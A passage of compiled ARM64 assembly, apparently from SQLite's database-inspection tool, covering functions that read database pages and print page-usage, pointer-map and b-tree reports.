add x3, x3, l_.str.35@PAGEOFF
bl _print_decode_line
ldr w2, [sp, #4] ; 4-byte Folded Reload
ldr x0, [sp, #8]
mov w1, #56
adrp x3, l_.str.36@PAGE
add x3, x3, l_.str.36@PAGEOFF
bl _print_decode_line
ldr w2, [sp, #4] ; 4-byte Folded Reload
ldr x0, [sp, #8]
mov w1, #60
adrp x3, l_.str.37@PAGE
add x3, x3, l_.str.37@PAGEOFF
bl _print_decode_line
ldr w2, [sp, #4] ; 4-byte Folded Reload
ldr x0, [sp, #8]
mov w1, #64
adrp x3, l_.str.38@PAGE
add x3, x3, l_.str.38@PAGEOFF
bl _print_decode_line
ldr w2, [sp, #4] ; 4-byte Folded Reload
ldr x0, [sp, #8]
mov w1, #68
adrp x3, l_.str.39@PAGE
add x3, x3, l_.str.39@PAGEOFF
bl _print_decode_line
ldr w2, [sp, #4] ; 4-byte Folded Reload
ldr x0, [sp, #8]
mov w1, #72
adrp x3, l_.str.40@PAGE
add x3, x3, l_.str.40@PAGEOFF
bl _print_decode_line
ldr w2, [sp, #4] ; 4-byte Folded Reload
ldr x0, [sp, #8]
mov w1, #76
adrp x3, l_.str.41@PAGE
add x3, x3, l_.str.41@PAGEOFF
bl _print_decode_line
ldr w2, [sp, #4] ; 4-byte Folded Reload
ldr x0, [sp, #8]
mov w1, #80
adrp x3, l_.str.42@PAGE
add x3, x3, l_.str.42@PAGEOFF
bl _print_decode_line
ldr w2, [sp, #4] ; 4-byte Folded Reload
ldr x0, [sp, #8]
mov w1, #84
adrp x3, l_.str.43@PAGE
add x3, x3, l_.str.43@PAGEOFF
bl _print_decode_line
ldr w2, [sp, #4] ; 4-byte Folded Reload
ldr x0, [sp, #8]
mov w1, #88
adrp x3, l_.str.44@PAGE
add x3, x3, l_.str.44@PAGEOFF
bl _print_decode_line
ldr w2, [sp, #4] ; 4-byte Folded Reload
ldr x0, [sp, #8]
mov w1, #92
adrp x3, l_.str.45@PAGE
add x3, x3, l_.str.45@PAGEOFF
bl _print_decode_line
ldr w2, [sp, #4] ; 4-byte Folded Reload
ldr x0, [sp, #8]
mov w1, #96
adrp x3, l_.str.46@PAGE
add x3, x3, l_.str.46@PAGEOFF
bl _print_decode_line
ldp x29, x30, [sp, #16] ; 16-byte Folded Reload
add sp, sp, #32
ret
.cfi_endproc
; -- End function
.p2align 2 ; -- Begin function page_usage_report
_page_usage_report: ; @page_usage_report
.cfi_startproc
; %bb.0:
sub sp, sp, #368
.cfi_def_cfa_offset 368
stp x28, x27, [sp, #336] ; 16-byte Folded Spill
stp x29, x30, [sp, #352] ; 16-byte Folded Spill
add x29, sp, #352
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
.cfi_offset w27, -24
.cfi_offset w28, -32
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
stur x8, [x29, #-24]
str x0, [sp, #120]
adrp x8, _mxPage@PAGE
ldr w8, [x8, _mxPage@PAGEOFF]
subs w8, w8, #1
cset w8, ge
tbnz w8, #0, LBB4_2
b LBB4_1
LBB4_1:
adrp x0, l_.str.51@PAGE
add x0, x0, l_.str.51@PAGEOFF
bl _printf
b LBB4_26
LBB4_2:
ldr x0, [sp, #120]
add x1, sp, #96
bl _sqlite3_open
str w0, [sp, #108]
ldr w8, [sp, #108]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB4_4
b LBB4_3
LBB4_3:
ldr x0, [sp, #96]
bl _sqlite3_errmsg
mov x8, sp
str x0, [x8]
adrp x0, l_.str.52@PAGE
add x0, x0, l_.str.52@PAGEOFF
bl _printf
ldr x0, [sp, #96]
bl _sqlite3_close
b LBB4_26
LBB4_4:
adrp x8, _mxPage@PAGE
ldr w8, [x8, _mxPage@PAGEOFF]
add w9, w8, #1
; implicit-def: $x8
mov x8, x9
sxtw x9, w8
mov x8, #8
mul x8, x8, x9
mov x0, x8
bl _sqlite3_malloc
adrp x8, _zPageUse@PAGE
str x0, [x8, _zPageUse@PAGEOFF]
ldr x8, [x8, _zPageUse@PAGEOFF]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB4_6
b LBB4_5
LBB4_5:
bl _out_of_memory
b LBB4_6
LBB4_6:
adrp x8, _zPageUse@PAGE
ldr x0, [x8, _zPageUse@PAGEOFF]
adrp x8, _mxPage@PAGE
ldr w8, [x8, _mxPage@PAGEOFF]
mov w9, #1
str w9, [sp, #68] ; 4-byte Folded Spill
add w9, w8, #1
; implicit-def: $x8
mov x8, x9
sxtw x9, w8
mov x8, #8
mul x2, x8, x9
mov w1, #0
str w1, [sp, #72] ; 4-byte Folded Spill
mov x3, #-1
bl ___memset_chk
ldr w0, [sp, #72] ; 4-byte Folded Reload
mov w1, #100
bl _getContent
str x0, [sp, #80]
ldr x8, [sp, #80]
add x0, x8, #32
bl _decodeInt32
bl _page_usage_freelist
ldr x0, [sp, #80]
bl _page_usage_ptrmap
ldr x0, [sp, #80]
bl _free
ldr w0, [sp, #68] ; 4-byte Folded Reload
ldr w2, [sp, #72] ; 4-byte Folded Reload
mov x1, x2
adrp x3, l_.str.53@PAGE
add x3, x3, l_.str.53@PAGEOFF
bl _page_usage_btree
ldr x0, [sp, #96]
adrp x1, l_.str.54@PAGE
add x1, x1, l_.str.54@PAGEOFF
mov x4, #0
mov x2, x4
mov x3, x4
bl _sqlite3_exec
str wzr, [sp, #112]
b LBB4_7
LBB4_7: ; =>This Loop Header: Depth=1
; Child Loop BB4_10 Depth 2
ldr w8, [sp, #112]
subs w8, w8, #2
cset w8, ge
tbnz w8, #0, LBB4_18
b LBB4_8
LBB4_8: ; in Loop: Header=BB4_7 Depth=1
ldr w8, [sp, #112]
subs w8, w8, #0
cset w8, ne
and w10, w8, #0x1
adrp x9, l_.str.57@PAGE
add x9, x9, l_.str.57@PAGEOFF
adrp x8, l_.str.56@PAGE
add x8, x8, l_.str.56@PAGEOFF
ands w10, w10, #0x1
csel x8, x8, x9, ne
mov x9, sp
str x8, [x9]
mov w0, #200
add x1, sp, #128
str x1, [sp, #56] ; 8-byte Folded Spill
adrp x2, l_.str.55@PAGE
add x2, x2, l_.str.55@PAGEOFF
bl _sqlite3_snprintf
ldr x1, [sp, #56] ; 8-byte Folded Reload
ldr x0, [sp, #96]
mov w2, #-1
add x3, sp, #88
mov x4, #0
bl _sqlite3_prepare_v2
str w0, [sp, #108]
ldr w8, [sp, #108]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB4_13
b LBB4_9
LBB4_9: ; in Loop: Header=BB4_7 Depth=1
b LBB4_10
LBB4_10: ; Parent Loop BB4_7 Depth=1
; => This Inner Loop Header: Depth=2
ldr x0, [sp, #88]
bl _sqlite3_step
subs w8, w0, #100
cset w8, ne
tbnz w8, #0, LBB4_12
b LBB4_11
LBB4_11: ; in Loop: Header=BB4_10 Depth=2
ldr x0, [sp, #88]
mov w1, #2
bl _sqlite3_column_int
str w0, [sp, #76]
ldr w8, [sp, #76]
str w8, [sp, #52] ; 4-byte Folded Spill
ldr x0, [sp, #88]
mov w1, #1
bl _sqlite3_column_text
mov x3, x0
ldr w0, [sp, #52] ; 4-byte Folded Reload
mov w2, #0
mov x1, x2
bl _page_usage_btree
b LBB4_10
LBB4_12: ; in Loop: Header=BB4_7 Depth=1
b LBB4_14
LBB4_13: ; in Loop: Header=BB4_7 Depth=1
ldr x0, [sp, #96]
bl _sqlite3_errmsg
mov x8, sp
str x0, [x8]
adrp x0, l_.str.58@PAGE
add x0, x0, l_.str.58@PAGEOFF
bl _printf
b LBB4_14
LBB4_14: ; in Loop: Header=BB4_7 Depth=1
ldr x0, [sp, #88]
bl _sqlite3_finalize
str w0, [sp, #108]
ldr w8, [sp, #108]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB4_16
b LBB4_15
LBB4_15:
b LBB4_18
LBB4_16: ; in Loop: Header=BB4_7 Depth=1
b LBB4_17
LBB4_17: ; in Loop: Header=BB4_7 Depth=1
ldr w8, [sp, #112]
add w8, w8, #1
str w8, [sp, #112]
b LBB4_7
LBB4_18:
ldr x0, [sp, #96]
bl _sqlite3_close
mov w8, #1
str w8, [sp, #116]
b LBB4_19
LBB4_19: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #116]
adrp x9, _mxPage@PAGE
ldr w9, [x9, _mxPage@PAGEOFF]
subs w8, w8, w9
cset w8, gt
tbnz w8, #0, LBB4_25
b LBB4_20
LBB4_20: ; in Loop: Header=BB4_19 Depth=1
ldr w9, [sp, #116]
; implicit-def: $x8
mov x8, x9
str x8, [sp, #40] ; 8-byte Folded Spill
adrp x8, _zPageUse@PAGE
ldr x8, [x8, _zPageUse@PAGEOFF]
ldrsw x9, [sp, #116]
ldr x8, [x8, x9, lsl #3]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB4_22
b LBB4_21
LBB4_21: ; in Loop: Header=BB4_19 Depth=1
adrp x8, _zPageUse@PAGE
ldr x8, [x8, _zPageUse@PAGEOFF]
ldrsw x9, [sp, #116]
ldr x8, [x8, x9, lsl #3]
str x8, [sp, #32] ; 8-byte Folded Spill
b LBB4_23
LBB4_22: ; in Loop: Header=BB4_19 Depth=1
adrp x8, l_.str.60@PAGE
add x8, x8, l_.str.60@PAGEOFF
str x8, [sp, #32] ; 8-byte Folded Spill
b LBB4_23
LBB4_23: ; in Loop: Header=BB4_19 Depth=1
ldr x10, [sp, #40] ; 8-byte Folded Reload
ldr x8, [sp, #32] ; 8-byte Folded Reload
mov x9, sp
str x10, [x9]
str x8, [x9, #8]
adrp x0, l_.str.59@PAGE
add x0, x0, l_.str.59@PAGEOFF
bl _printf
adrp x8, _zPageUse@PAGE
ldr x8, [x8, _zPageUse@PAGEOFF]
ldrsw x9, [sp, #116]
ldr x0, [x8, x9, lsl #3]
bl _sqlite3_free
b LBB4_24
LBB4_24: ; in Loop: Header=BB4_19 Depth=1
ldr w8, [sp, #116]
add w8, w8, #1
str w8, [sp, #116]
b LBB4_19
LBB4_25:
adrp x8, _zPageUse@PAGE
str x8, [sp, #24] ; 8-byte Folded Spill
ldr x0, [x8, _zPageUse@PAGEOFF]
bl _sqlite3_free
ldr x8, [sp, #24] ; 8-byte Folded Reload
; kill: def $x9 killed $xzr
str xzr, [x8, _zPageUse@PAGEOFF]
b LBB4_26
LBB4_26:
ldur x9, [x29, #-24]
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB4_28
b LBB4_27
LBB4_27:
bl ___stack_chk_fail
LBB4_28:
ldp x29, x30, [sp, #352] ; 16-byte Folded Reload
ldp x28, x27, [sp, #336] ; 16-byte Folded Reload
add sp, sp, #368
ret
.cfi_endproc
; -- End function
.p2align 2 ; -- Begin function ptrmap_coverage_report
_ptrmap_coverage_report: ; @ptrmap_coverage_report
.cfi_startproc
; %bb.0:
sub sp, sp, #112
.cfi_def_cfa_offset 112
stp x29, x30, [sp, #96] ; 16-byte Folded Spill
add x29, sp, #96
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-8]
adrp x8, _mxPage@PAGE
ldr w8, [x8, _mxPage@PAGEOFF]
subs w8, w8, #1
cset w8, ge
tbnz w8, #0, LBB5_2
b LBB5_1
LBB5_1:
adrp x0, l_.str.51@PAGE
add x0, x0, l_.str.51@PAGEOFF
bl _printf
b LBB5_21
LBB5_2:
mov w0, #0
mov w1, #100
bl _getContent
stur x0, [x29, #-24]
ldur x8, [x29, #-24]
ldrb w8, [x8, #55]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB5_4
b LBB5_3
LBB5_3:
adrp x0, l_.str.77@PAGE
add x0, x0, l_.str.77@PAGEOFF
bl _printf
b LBB5_21
LBB5_4:
adrp x8, _pagesize@PAGE
ldr w8, [x8, _pagesize@PAGEOFF]
ldur x9, [x29, #-24]
ldrb w9, [x9, #20]
subs w8, w8, w9
stur w8, [x29, #-36]
ldur w8, [x29, #-36]
mov w9, #5
sdiv w8, w8, w9
stur w8, [x29, #-40]
ldur x0, [x29, #-24]
bl _free
mov x9, sp
mov x8, #1
str x8, [x9]
adrp x0, l_.str.78@PAGE
add x0, x0, l_.str.78@PAGEOFF
bl _printf
mov w8, #2
stur w8, [x29, #-12]
b LBB5_5
LBB5_5: ; =>This Loop Header: Depth=1
; Child Loop BB5_7 Depth 2
ldur w8, [x29, #-12]
adrp x9, _mxPage@PAGE
ldr w9, [x9, _mxPage@PAGEOFF]
subs w8, w8, w9
cset w8, gt
tbnz w8, #0, LBB5_21
b LBB5_6
LBB5_6: ; in Loop: Header=BB5_5 Depth=1
ldur w9, [x29, #-12]
; implicit-def: $x8
mov x8, x9
ldur w9, [x29, #-12]
add w11, w9, #1
ldur w9, [x29, #-12]
ldur w10, [x29, #-40]
add w10, w9, w10
mov x9, sp
str x8, [x9]
; implicit-def: $x8
mov x8, x11
str x8, [x9, #8]
; implicit-def: $x8
mov x8, x10
str x8, [x9, #16]
adrp x0, l_.str.79@PAGE
add x0, x0, l_.str.79@PAGEOFF
bl _printf
ldur w8, [x29, #-12]
subs w8, w8, #1
adrp x9, _pagesize@PAGE
ldr w9, [x9, _pagesize@PAGEOFF]
mul w0, w8, w9
ldur w1, [x29, #-36]
bl _getContent
stur x0, [x29, #-32]
stur wzr, [x29, #-44]
b LBB5_7
LBB5_7: ; Parent Loop BB5_5 Depth=1
; => This Inner Loop Header: Depth=2
ldur w8, [x29, #-44]
add w8, w8, #5
ldur w9, [x29, #-36]
subs w8, w8, w9
cset w8, gt
mov w9, #0
str w9, [sp, #32] ; 4-byte Folded Spill
tbnz w8, #0, LBB5_9
b LBB5_8
LBB5_8: ; in Loop: Header=BB5_7 Depth=2
ldur w8, [x29, #-12]
add w8, w8, #1
ldur w9, [x29, #-44]
mov w10, #5
sdiv w9, w9, w10
add w8, w8, w9
adrp x9, _mxPage@PAGE
ldr w9, [x9, _mxPage@PAGEOFF]
subs w8, w8, w9
cset w8, le
str w8, [sp, #32] ; 4-byte Folded Spill
b LBB5_9
LBB5_9: ; in Loop: Header=BB5_7 Depth=2
ldr w8, [sp, #32] ; 4-byte Folded Reload
tbz w8, #0, LBB5_19
b LBB5_10
LBB5_10: ; in Loop: Header=BB5_7 Depth=2
adrp x8, l_.str.60@PAGE
add x8, x8, l_.str.60@PAGEOFF
str x8, [sp, #40]
ldur x8, [x29, #-32]
ldur w9, [x29, #-44]
add w9, w9, #1
add x0, x8, w9, sxtw
bl _decodeInt32
str w0, [sp, #36]
ldur x8, [x29, #-32]
ldursw x9, [x29, #-44]
ldrb w8, [x8, x9]
subs w8, w8, #1
; kill: def $x8 killed $w8
str x8, [sp, #24] ; 8-byte Folded Spill
subs x8, x8, #4
cset w8, hi
tbnz w8, #0, LBB5_17
; %bb.11: ; in Loop: Header=BB5_7 Depth=2
ldr x11, [sp, #24] ; 8-byte Folded Reload
adrp x10, lJTI5_0@PAGE
add x10, x10, lJTI5_0@PAGEOFF
Ltmp0:
adr x8, Ltmp0
ldrsw x9, [x10, x11, lsl #2]
add x8, x8, x9
br x8
LBB5_12: ; in Loop: Header=BB5_7 Depth=2
adrp x8, l_.str.80@PAGE
add x8, x8, l_.str.80@PAGEOFF
str x8, [sp, #40]
b LBB5_17
LBB5_13: ; in Loop: Header=BB5_7 Depth=2
adrp x8, l_.str.81@PAGE
add x8, x8, l_.str.81@PAGEOFF
str x8, [sp, #40]
b LBB5_17
LBB5_14: ; in Loop: Header=BB5_7 Depth=2
adrp x8, l_.str.82@PAGE
add x8, x8, l_.str.82@PAGEOFF
str x8, [sp, #40]
b LBB5_17
LBB5_15: ; in Loop: Header=BB5_7 Depth=2
adrp x8, l_.str.83@PAGE
add x8, x8, l_.str.83@PAGEOFF
str x8, [sp, #40]
b LBB5_17
LBB5_16: ; in Loop: Header=BB5_7 Depth=2
adrp x8, l_.str.84@PAGE
add x8, x8, l_.str.84@PAGEOFF
str x8, [sp, #40]
b LBB5_17
LBB5_17: ; in Loop: Header=BB5_7 Depth=2
ldur w8, [x29, #-12]
add w8, w8, #1
ldur w9, [x29, #-44]
mov w10, #5
sdiv w9, w9, w10
add w12, w8, w9
ldr x10, [sp, #40]
ldr w9, [sp, #36]
; implicit-def: $x8
mov x8, x9
mov x9, sp
; implicit-def: $x11
mov x11, x12
str x11, [x9]
str x10, [x9, #8]
str x8, [x9, #16]
adrp x0, l_.str.85@PAGE
add x0, x0, l_.str.85@PAGEOFF
bl _printf
b LBB5_18
LBB5_18: ; in Loop: Header=BB5_7 Depth=2
ldur w8, [x29, #-44]
add w8, w8, #5
stur w8, [x29, #-44]
b LBB5_7
LBB5_19: ; in Loop: Header=BB5_5 Depth=1
ldur x0, [x29, #-32]
bl _free
b LBB5_20
LBB5_20: ; in Loop: Header=BB5_5 Depth=1
ldur w8, [x29, #-40]
add w9, w8, #1
ldur w8, [x29, #-12]
add w8, w8, w9
stur w8, [x29, #-12]
b LBB5_5
LBB5_21:
ldp x29, x30, [sp, #96] ; 16-byte Folded Reload
add sp, sp, #112
ret
.cfi_endproc
.p2align 2
lJTI5_0:
.long LBB5_12-Ltmp0
.long LBB5_13-Ltmp0
.long LBB5_14-Ltmp0
.long LBB5_15-Ltmp0
.long LBB5_16-Ltmp0
; -- End function
.p2align 2 ; -- Begin function getContent
_getContent: ; @getContent
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
stp x29, x30, [sp, #32] ; 16-byte Folded Spill
add x29, sp, #32
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur w0, [x29, #-4]
stur w1, [x29, #-8]
ldur w8, [x29, #-8]
add w9, w8, #32
; implicit-def: $x8
mov x8, x9
sxtw x0, w8
bl _malloc
str x0, [sp, #16]
ldr x8, [sp, #16]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB6_2
b LBB6_1
LBB6_1:
bl _out_of_memory
b LBB6_2
LBB6_2:
ldr x0, [sp, #16]
ldur w8, [x29, #-8]
add w9, w8, #32
; implicit-def: $x8
mov x8, x9
sxtw x2, w8
mov w1, #0
str w1, [sp, #4] ; 4-byte Folded Spill
mov x3, #-1
bl ___memset_chk
ldr w2, [sp, #4] ; 4-byte Folded Reload
adrp x8, _db@PAGE
str x8, [sp, #8] ; 8-byte Folded Spill
ldr w0, [x8, _db@PAGEOFF]
ldursw x1, [x29, #-4]
bl _lseek
ldr x8, [sp, #8] ; 8-byte Folded Reload
ldr w0, [x8, _db@PAGEOFF]
ldr x1, [sp, #16]
ldursw x2, [x29, #-8]
bl _read
ldursw x8, [x29, #-8]
subs x8, x0, x8
cset w8, ge
tbnz w8, #0, LBB6_4
b LBB6_3
LBB6_3:
ldr x0, [sp, #16]
ldursw x2, [x29, #-8]
mov w1, #0
mov x3, #-1
bl ___memset_chk
b LBB6_4
LBB6_4:
ldr x0, [sp, #16]
ldp x29, x30, [sp, #32] ; 16-byte Folded Reload
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.p2align 2 ; -- Begin function decode_btree_page
_decode_btree_page: ; @decode_btree_page
.cfi_startproc
; %bb.0:
sub sp, sp, #224
.cfi_def_cfa_offset 224
stp x29, x30, [sp, #208] ; 16-byte Folded Spill
add x29, sp, #208
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
stur x8, [x29, #-8]
stur x0, [x29, #-48]
stur w1, [x29, #-52]
stur w2, [x29, #-56]
stur x3, [x29, #-64]
adrp x8, l_.str.86@PAGE
add x8, x8, l_.str.86@PAGEOFF
stur x8, [x29, #-72]
stur wzr, [x29, #-92]
stur wzr, [x29, #-96]
mov w8, #-2
stur w8, [x29, #-100]
; kill: def $x8 killed $xzr
str xzr, [sp, #96]
ldur x8, [x29, #-48]
ldrb w8, [x8]
subs w8, w8, #2
; kill: def $x8 killed $w8
str x8, [sp, #64] ; 8-byte Folded Spill
subs x8, x8, #11
cset w8, hi
tbnz w8, #0, LBB7_6
; %bb.1:
ldr x11, [sp, #64] ; 8-byte Folded Reload
adrp x10, lJTI7_0@PAGE
add x10, x10, lJTI7_0@PAGEOFF
Ltmp1:
adr x8, Ltmp1
ldrsw x9, [x10, x11, lsl #2]
add x8, x8, x9
br x8
LBB7_2:
adrp x8, l_.str.87@PAGE
add x8, x8, l_.str.87@PAGEOFF
stur x8, [x29, #-72]
b LBB7_6
LBB7_3:
adrp x8, l_.str.88@PAGE
add x8, x8, l_.str.88@PAGEOFF
stur x8, [x29, #-72]
b LBB7_6
LBB7_4:
adrp x8, l_.str.89@PAGE
add x8, x8, l_.str.89@PAGEOFF
stur x8, [x29, #-72]
b LBB7_6
LBB7_5:
adrp x8, l_.str.90@PAGE
add x8, x8, l_.str.90@PAGEOFF
stur x8, [x29, #-72]
b LBB7_6
LBB7_6:
b LBB7_7
LBB7_7: ; =>This Loop Header: Depth=1
; Child Loop BB7_16 Depth 2
ldur x8, [x29, #-64]
ldrb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB7_21
b LBB7_8
LBB7_8: ; in Loop: Header=BB7_7 Depth=1
ldur x8, [x29, #-64]
ldrsb w8, [x8]
str w8, [sp, #60] ; 4-byte Folded Spill
subs w8, w8, #99
cset w8, eq
tbnz w8, #0, LBB7_11
b LBB7_9
LBB7_9: ; in Loop: Header=BB7_7 Depth=1
ldr w8, [sp, #60] ; 4-byte Folded Reload
subs w8, w8, #100
cset w8, eq
tbnz w8, #0, LBB7_13
b LBB7_10
LBB7_10: ; in Loop: Header=BB7_7 Depth=1
ldr w8, [sp, #60] ; 4-byte Folded Reload
subs w8, w8, #109
cset w8, eq
tbnz w8, #0, LBB7_12
b LBB7_20
LBB7_11: ; in Loop: Header=BB7_7 Depth=1
mov w8, #1
stur w8, [x29, #-92]
b LBB7_20
LBB7_12: ; in Loop: Header=BB7_7 Depth=1
mov w8, #1
stur w8, [x29, #-96]
b LBB7_20
LBB7_13: ; in Loop: Header=BB7_7 Depth=1
ldur x8, [x29, #-64]
ldrsb w0, [x8, #1]
bl _isdigit
subs w8, w0, #0
cset w8, ne
tbnz w8, #0, LBB7_15
b LBB7_14
LBB7_14: ; in Loop: Header=BB7_7 Depth=1
mov w8, #-1
stur w8, [x29, #-100]
b LBB7_19
LBB7_15: ; in Loop: Header=BB7_7 Depth=1
stur wzr, [x29, #-100]
b LBB7_16
LBB7_16: ; Parent Loop BB7_7 Depth=1
; => This Inner Loop Header: Depth=2
ldur x8, [x29, #-64]
ldrsb w0, [x8, #1]
bl _isdigit
subs w8, w0, #0
cset w8, eq
tbnz w8, #0, LBB7_18
b LBB7_17
LBB7_17: ; in Loop: Header=BB7_16 Depth=2
ldur x8, [x29, #-64]
add x8, x8, #1
stur x8, [x29, #-64]
ldur w8, [x29, #-100]
mov w9, #10
mul w8, w8, w9
ldur x9, [x29, #-64]
ldrsb w9, [x9]
add w8, w8, w9
subs w8, w8, #48
stur w8, [x29, #-100]
b LBB7_16
LBB7_18: ; in Loop: Header=BB7_7 Depth=1
b LBB7_19
LBB7_19: ; in Loop: Header=BB7_7 Depth=1
b LBB7_20
LBB7_20: ; in Loop: Header=BB7_7 Depth=1
ldur x8, [x29, #-64]
add x8, x8, #1
stur x8, [x29, #-64]
b LBB7_7
LBB7_21:
ldur x8, [x29, #-48]
ldrb w9, [x8, #3]
ldur x8, [x29, #-48]
ldrb w8, [x8, #4]
add w8, w8, w9, lsl #8
stur w8, [x29, #-76]
ldur x8, [x29, #-48]
ldrb w8, [x8]
subs w8, w8, #2
cset w8, eq
mov w9, #1
str w9, [sp, #56] ; 4-byte Folded Spill
tbnz w8, #0, LBB7_23
b LBB7_22
LBB7_22:
ldur x8, [x29, #-48]
ldrb w8, [x8]
subs w8, w8, #5
cset w8, eq
str w8, [sp, #56] ; 4-byte Folded Spill
b LBB7_23
LBB7_23:
ldr w8, [sp, #56] ; 4-byte Folded Reload
and w10, w8, #0x1
mov w9, #8
mov w8, #12
ands w10, w10, #0x1
csel w8, w8, w9, ne
stur w8, [x29, #-88]
ldur w8, [x29, #-100]
ldur w9, [x29, #-76]
subs w8, w8, w9
cset w8, lt
tbnz w8, #0, LBB7_25
b LBB7_24
LBB7_24:
ldur w8, [x29, #-52]
; implicit-def: $x10
mov x10, x8
ldur w9, [x29, #-76]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x10, [x9]
str x8, [x9, #8]
adrp x0, l_.str.91@PAGE
add x0, x0, l_.str.91@PAGEOFF
bl _printf
b LBB7_53
LBB7_25:
ldur w9, [x29, #-52]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x8, [x9]
adrp x0, l_.str.92@PAGE
add x0, x0, l_.str.92@PAGEOFF
bl _printf
ldur x0, [x29, #-48]
ldur x3, [x29, #-72]
mov w1, #0
mov w2, #1
str w2, [sp, #52] ; 4-byte Folded Spill
bl _print_decode_line
ldr w1, [sp, #52] ; 4-byte Folded Reload
ldur x0, [x29, #-48]
mov w2, #2
str w2, [sp, #48] ; 4-byte Folded Spill
adrp x3, l_.str.93@PAGE
add x3, x3, l_.str.93@PAGEOFF
bl _print_decode_line
ldr w2, [sp, #48] ; 4-byte Folded Reload
ldur x0, [x29, #-48]
mov w1, #3
adrp x3, l_.str.94@PAGE
add x3, x3, l_.str.94@PAGEOFF
bl _print_decode_line
ldr w2, [sp, #48] ; 4-byte Folded Reload
ldur x0, [x29, #-48]
mov w1, #5
adrp x3, l_.str.95@PAGE
add x3, x3, l_.str.95@PAGEOFF
bl _print_decode_line
ldr w2, [sp, #52] ; 4-byte Folded Reload
ldur x0, [x29, #-48]
mov w1, #7
adrp x3, l_.str.96@PAGE
add x3, x3, l_.str.96@PAGEOFF
bl _print_decode_line
ldur x8, [x29, #-48]
ldrb w8, [x8]
subs w8, w8, #2
cset w8, eq
tbnz w8, #0, LBB7_27
b LBB7_26
LBB7_26:
ldur x8, [x29, #-48]
ldrb w8, [x8]
subs w8, w8, #5
cset w8, ne
tbnz w8, #0, LBB7_28
b LBB7_27
LBB7_27:
ldur x0, [x29, #-48]
mov w1, #8
mov w2, #4
adrp x3, l_.str.97@PAGE
add x3, x3, l_.str.97@PAGEOFF
bl _print_decode_line
b LBB7_28
LBB7_28:
ldur w8, [x29, #-100]
adds w8, w8, #2
cset w8, ne
tbnz w8, #0, LBB7_31
b LBB7_29
LBB7_29:
ldur w8, [x29, #-76]
subs w8, w8, #0
cset w8, le
tbnz w8, #0, LBB7_31
b LBB7_30
LBB7_30:
adrp x0, l_.str.98@PAGE
add x0, x0, l_.str.98@PAGEOFF
bl _printf
b LBB7_31
LBB7_31:
ldur w8, [x29, #-96]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB7_33
b LBB7_32
LBB7_32:
adrp x8, _pagesize@PAGE
str x8, [sp, #32] ; 8-byte Folded Spill
ldrsw x0, [x8, _pagesize@PAGEOFF]
bl _malloc
ldr x8, [sp, #32] ; 8-byte Folded Reload
str x0, [sp, #96]
ldr x0, [sp, #96]
ldrsw x2, [x8, _pagesize@PAGEOFF]
mov w1, #46
mov x3, #-1
str x3, [sp, #40] ; 8-byte Folded Spill
bl ___memset_chk
ldr x3, [sp, #40] ; 8-byte Folded Reload
ldr x0, [sp, #96]
ldursw x2, [x29, #-56]
mov w1, #49
bl ___memset_chk
ldr x3, [sp, #40] ; 8-byte Folded Reload
ldr x8, [sp, #96]
ldursw x9, [x29, #-56]
add x0, x8, x9
ldursw x2, [x29, #-88]
mov w1, #72
bl ___memset_chk
ldr x3, [sp, #40] ; 8-byte Folded Reload
ldr x8, [sp, #96]
ldur w9, [x29, #-56]
ldur w10, [x29, #-88]
add w9, w9, w10
add x0, x8, w9, sxtw
ldur w9, [x29, #-76]
mov w8, #2
mul w9, w8, w9
; implicit-def: $x8
mov x8, x9
sxtw x2, w8
mov w1, #80
bl ___memset_chk
b LBB7_33
LBB7_33:
stur wzr, [x29, #-80]
b LBB7_34
LBB7_34: ; =>This Inner Loop Header: Depth=1
ldur w8, [x29, #-80]
ldur w9, [x29, #-76]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB7_47
b LBB7_35
LBB7_35: ; in Loop: Header=BB7_34 Depth=1
ldur w8, [x29, #-88]
ldur w9, [x29, #-80]
add w8, w8, w9, lsl #1
str w8, [sp, #92]
ldur x8, [x29, #-48]
ldrsw x9, [sp, #92]
ldrb w9, [x8, x9]
ldur x8, [x29, #-48]
ldr w10, [sp, #92]
add w10, w10, #1
ldrb w8, [x8, w10, sxtw]
add w8, w8, w9, lsl #8
str w8, [sp, #92]
ldur x8, [x29, #-48]
ldrb w0, [x8]
ldur x8, [x29, #-48]
ldr w9, [sp, #92]
ldur w10, [x29, #-56]
subs w9, w9, w10
add x1, x8, w9, sxtw
ldur w2, [x29, #-92]
add x3, sp, #80
bl _describeCell
str x0, [sp, #72]
ldur w8, [x29, #-96]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB7_39
b LBB7_36
LBB7_36: ; in Loop: Header=BB7_34 Depth=1
ldr x8, [sp, #96]
ldrsw x9, [sp, #92]
add x0, x8, x9
ldr x2, [sp, #72]
mov w1, #42
mov x3, #-1
bl ___memset_chk
ldr x8, [sp, #96]
ldrsw x9, [sp, #92]
add x9, x8, x9
mov w8, #91
strb w8, [x9]
ldr x8, [sp, #96]
ldrsw x9, [sp, #92]
ldr x10, [sp, #72]
add x9, x9, x10
